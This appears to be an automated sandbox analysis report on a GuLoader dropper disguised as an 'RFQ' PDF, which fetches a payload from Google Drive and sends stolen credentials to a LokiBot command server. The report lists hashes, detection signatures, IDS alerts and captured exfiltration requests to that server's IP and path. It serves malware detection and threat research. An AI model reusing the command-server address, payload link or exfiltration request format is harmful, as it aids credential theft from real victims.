Windows Analysis Report RFQ 001030112021#U00b7pdf.exe

Overview

General Information

Sample Name: RFQ 001030112021#U00b7pdf.exe
Analysis ID: 531794
MD5: 754fa9ff30ec6e1cd7a29837adeb7a8b
SHA1: 09472c720424ab26d13b7dd8cc2e199a826a88d1
SHA256: 957ac63b9471fe11ba63a0bca4759741b305525ef1c4a2e4be262ed4464a2935
Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
IP address seen in connection with other malware
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1f5uP"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000008.00000000.770261395.0000000000560000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
  Source: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1f5uP"}
Multi AV Scanner detection for submitted file
  Source: RFQ 001030112021#U00b7pdf.exe, Metadefender: Detection: 17%
  Source: RFQ 001030112021#U00b7pdf.exe, ReversingLabs: Detection: 17%
Multi AV Scanner detection for domain / URL
  Source: http://63.250.34.171/tickets.php?id=277, Virustotal: Detection: 8%
  Source: 0.2.RFQ 001030112021#U00b7pdf.exe.400000.0.unpack, Avira: Label: TR/Dropper.VB.Gen
  Source: 0.0.RFQ 001030112021#U00b7pdf.exe.400000.0.unpack, Avira: Label: TR/Dropper.VB.Gen
  Source: 8.0.RFQ 001030112021#U00b7pdf.exe.400000.0.unpack, Avira: Label: TR/Dropper.VB.Gen
  Source: 8.0.RFQ 001030112021#U00b7pdf.exe.400000.2.unpack, Avira: Label: TR/Dropper.VB.Gen
  Source: 8.0.RFQ 001030112021#U00b7pdf.exe.400000.1.unpack, Avira: Label: TR/Dropper.VB.Gen
  Source: 8.0.RFQ 001030112021#U00b7pdf.exe.400000.3.unpack, Avira: Label: TR/Dropper.VB.Gen
  Source: RFQ 001030112021#U00b7pdf.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
  Source: unknown, HTTPS traffic detected: 142.250.180.110:443 -> 192.168.2.4:49792 version: TLS 1.2
  Source: unknown, HTTPS traffic detected: 216.58.198.33:443 -> 192.168.2.4:49796 version: TLS 1.2

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  Source: Traffic, Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49805 -> 63.250.34.171:80
  Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49805 -> 63.250.34.171:80
  Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49805 -> 63.250.34.171:80
  Source: Traffic, Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49805 -> 63.250.34.171:80
  Source: Traffic, Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49824 -> 63.250.34.171:80
  Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49824 -> 63.250.34.171:80
  Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49824 -> 63.250.34.171:80
  Source: Traffic, Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49824 -> 63.250.34.171:80
  Source: Traffic, Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49825 -> 63.250.34.171:80
  Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49825 -> 63.250.34.171:80
  Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49825 -> 63.250.34.171:80
  Source: Traffic, Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49825 -> 63.250.34.171:80
C2 URLs / IPs found in malware configuration
  Source: Malware configuration extractor, URLs: https://drive.google.com/uc?export=download&id=1f5uP
  Source: Joe Sandbox View, ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
  Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
  Source: Joe Sandbox View, IP Address: 63.250.34.171 63.250.34.171
  Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: drive.google.com | Cache-Control: no-cache | Cookie: CONSENT=YES+GB.en-GB+V9+BX
  Source: global traffic, HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/tmgkbuuoqg7e2eb3u8b2c66mt8m0nijc/1638356250000/03026244708369606156/*/1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb?e=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Cache-Control: no-cache | Host: doc-00-50-docs.googleusercontent.com | Connection: Keep-Alive
  Source: global traffic, HTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 63.250.34.171 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: AA495C78 | Content-Length: 190 | Connection: close
  Source: global traffic, HTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 63.250.34.171 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: AA495C78 | Content-Length: 190 | Connection: close
  Source: global traffic, HTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 63.250.34.171 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: AA495C78 | Content-Length: 163 | Connection: close
  Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49796
  Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49792
  Source: unknown, Network traffic detected: HTTP traffic on port 49796 -> 443
  Source: unknown, Network traffic detected: HTTP traffic on port 49792 -> 443
  Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Wed, 01 Dec 2021 10:57:40 GMT | Server: Apache/2.4.38 (Debian) | Content-Length: 287 | Connection: close | Content-Type: text/html; charset=UTF-8 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
  Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Wed, 01 Dec 2021 10:57:48 GMT | Server: Apache/2.4.38 (Debian) | Content-Length: 287 | Connection: close | Content-Type: text/html; charset=UTF-8 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
  Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Wed, 01 Dec 2021 10:57:52 GMT | Server: Apache/2.4.38 (Debian) | Content-Length: 287 | Connection: close | Content-Type: text/html; charset=UTF-8 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
  Source: unknown, TCP traffic detected without corresponding DNS query: 63.250.34.171
  Source: unknown, HTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 63.250.34.171 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: AA495C78 | Content-Length: 190 | Connection: close
  Source: unknown, DNS traffic detected: queries for: drive.google.com

System Summary:

Potential malicious icon found
  Source: initial sample, Icon embedded in PE file: bad icon match: 20047c7c70f0e004
  Source: RFQ 001030112021#U00b7pdf.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9BF10_2_020B9BF1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B782D0_2_020B782D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020BD8720_2_020BD872
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B78800_2_020B7880
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B78990_2_020B7899
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B78A50_2_020B78A5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B98DD0_2_020B98DD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B79150_2_020B7915
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B792D0_2_020B792D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B79210_2_020B7921
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B99790_2_020B9979
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B799D0_2_020B799D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B79910_2_020B7991
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B99910_2_020B9991
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B79A90_2_020B79A9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B99BD0_2_020B99BD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B99DD0_2_020B99DD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B99D00_2_020B99D0
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B99E90_2_020B99E9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B99F50_2_020B99F5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7E400_2_020B7E40
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7E470_2_020B7E47
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7E590_2_020B7E59
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7E650_2_020B7E65
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7E790_2_020B7E79
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7EC20_2_020B7EC2
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7F3D0_2_020B7F3D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7F310_2_020B7F31
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B6F8A0_2_020B6F8A
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7F810_2_020B7F81
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B6F950_2_020B6F95
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B6FA10_2_020B6FA1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7FA50_2_020B7FA5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9C090_2_020B9C09
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7C3D0_2_020B7C3D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7C310_2_020B7C31
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7C7A0_2_020B7C7A
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9C880_2_020B9C88
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7C850_2_020B7C85
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9C950_2_020B9C95
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7CA90_2_020B7CA9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9CAD0_2_020B9CAD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9CA10_2_020B9CA1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8CFB0_2_020B8CFB
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9CFD0_2_020B9CFD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9CF10_2_020B9CF1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9D090_2_020B9D09
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7D250_2_020B7D25
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7D310_2_020B7D31
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FFD98_2_0056FFD9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FFC08_2_0056FFC0
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FFE58_2_0056FFE5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B2725 NtWriteVirtualMemory,TerminateProcess,0_2_020B2725
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9405 NtAllocateVirtualMemory,0_2_020B9405
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020BEA59 NtWriteVirtualMemory,NtProtectVirtualMemory,0_2_020BEA59
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020BEF41 NtOpenFile,0_2_020BEF41
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8209 NtWriteVirtualMemory,0_2_020B8209
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8215 NtWriteVirtualMemory,0_2_020B8215
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8221 NtWriteVirtualMemory,0_2_020B8221
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B826D NtWriteVirtualMemory,0_2_020B826D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8279 NtWriteVirtualMemory,0_2_020B8279
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8285 NtWriteVirtualMemory,0_2_020B8285
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B82ED NtWriteVirtualMemory,0_2_020B82ED
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B82F9 NtWriteVirtualMemory,0_2_020B82F9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8308 NtWriteVirtualMemory,0_2_020B8308
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8369 NtWriteVirtualMemory,0_2_020B8369
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B83E1 NtWriteVirtualMemory,0_2_020B83E1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8031 NtWriteVirtualMemory,0_2_020B8031
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8086 NtWriteVirtualMemory,0_2_020B8086
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B809D NtWriteVirtualMemory,0_2_020B809D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8091 NtWriteVirtualMemory,0_2_020B8091
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B80A9 NtWriteVirtualMemory,0_2_020B80A9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8105 NtWriteVirtualMemory,0_2_020B8105
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B811D NtWriteVirtualMemory,0_2_020B811D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8111 NtWriteVirtualMemory,0_2_020B8111
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8129 NtWriteVirtualMemory,0_2_020B8129
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B81B9 NtWriteVirtualMemory,0_2_020B81B9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B81C5 NtWriteVirtualMemory,0_2_020B81C5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B81DD NtWriteVirtualMemory,0_2_020B81DD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B81D1 NtWriteVirtualMemory,0_2_020B81D1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B81F8 NtWriteVirtualMemory,0_2_020B81F8
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8609 NtWriteVirtualMemory,0_2_020B8609
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B760D NtWriteVirtualMemory,0_2_020B760D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7619 NtWriteVirtualMemory,0_2_020B7619
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8615 NtWriteVirtualMemory,0_2_020B8615
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9629 NtAllocateVirtualMemory,0_2_020B9629
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B862D NtWriteVirtualMemory,0_2_020B862D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8621 NtWriteVirtualMemory,0_2_020B8621
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7625 NtWriteVirtualMemory,0_2_020B7625
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7631 NtWriteVirtualMemory,0_2_020B7631
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9635 NtAllocateVirtualMemory,0_2_020B9635
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B964D NtAllocateVirtualMemory,0_2_020B964D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9641 NtAllocateVirtualMemory,0_2_020B9641
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7664 NtWriteVirtualMemory,0_2_020B7664
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9685 NtAllocateVirtualMemory,0_2_020B9685
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B76B9 NtWriteVirtualMemory,0_2_020B76B9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B76C5 NtWriteVirtualMemory,0_2_020B76C5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B86C4 NtWriteVirtualMemory,0_2_020B86C4
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B76DD NtWriteVirtualMemory,0_2_020B76DD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B76D1 NtWriteVirtualMemory,0_2_020B76D1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B96FD NtAllocateVirtualMemory,0_2_020B96FD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B86FC NtWriteVirtualMemory,0_2_020B86FC
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B870C NtWriteVirtualMemory,0_2_020B870C
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B871D NtWriteVirtualMemory,0_2_020B871D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8729 NtWriteVirtualMemory,0_2_020B8729
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7739 NtWriteVirtualMemory,0_2_020B7739
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8735 NtWriteVirtualMemory,0_2_020B8735
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7745 NtWriteVirtualMemory,0_2_020B7745
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B775D NtWriteVirtualMemory,0_2_020B775D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7751 NtWriteVirtualMemory,0_2_020B7751
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B776E NtWriteVirtualMemory,0_2_020B776E
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7790 NtWriteVirtualMemory,0_2_020B7790
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9481 NtAllocateVirtualMemory,0_2_020B9481
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B94CA NtAllocateVirtualMemory,0_2_020B94CA
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B94C8 NtAllocateVirtualMemory,0_2_020B94C8
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B84C5 NtWriteVirtualMemory,0_2_020B84C5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B94D5 NtAllocateVirtualMemory,0_2_020B94D5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B94ED NtAllocateVirtualMemory,0_2_020B94ED
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B94E1 NtAllocateVirtualMemory,0_2_020B94E1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B74FD NtWriteVirtualMemory,0_2_020B74FD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B74F1 NtWriteVirtualMemory,0_2_020B74F1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B850C NtWriteVirtualMemory,0_2_020B850C
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9518 NtAllocateVirtualMemory,0_2_020B9518
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B752E NtWriteVirtualMemory,0_2_020B752E
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7539 NtWriteVirtualMemory,0_2_020B7539
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7545 NtWriteVirtualMemory,0_2_020B7545
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B959E NtAllocateVirtualMemory,0_2_020B959E
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8594 NtWriteVirtualMemory,0_2_020B8594
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B95A9 NtAllocateVirtualMemory,0_2_020B95A9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B85AD NtWriteVirtualMemory,0_2_020B85AD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B85A1 NtWriteVirtualMemory,0_2_020B85A1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B85B9 NtWriteVirtualMemory,0_2_020B85B9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B95B5 NtAllocateVirtualMemory,0_2_020B95B5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B95CD NtAllocateVirtualMemory,0_2_020B95CD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B95C1 NtAllocateVirtualMemory,0_2_020B95C1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B75E9 NtWriteVirtualMemory,0_2_020B75E9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7A12 NtWriteVirtualMemory,0_2_020B7A12
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7A7D NtWriteVirtualMemory,0_2_020B7A7D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7A71 NtWriteVirtualMemory,0_2_020B7A71
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7A89 NtWriteVirtualMemory,0_2_020B7A89
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7AED NtWriteVirtualMemory,0_2_020B7AED
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7B4D NtWriteVirtualMemory,0_2_020B7B4D
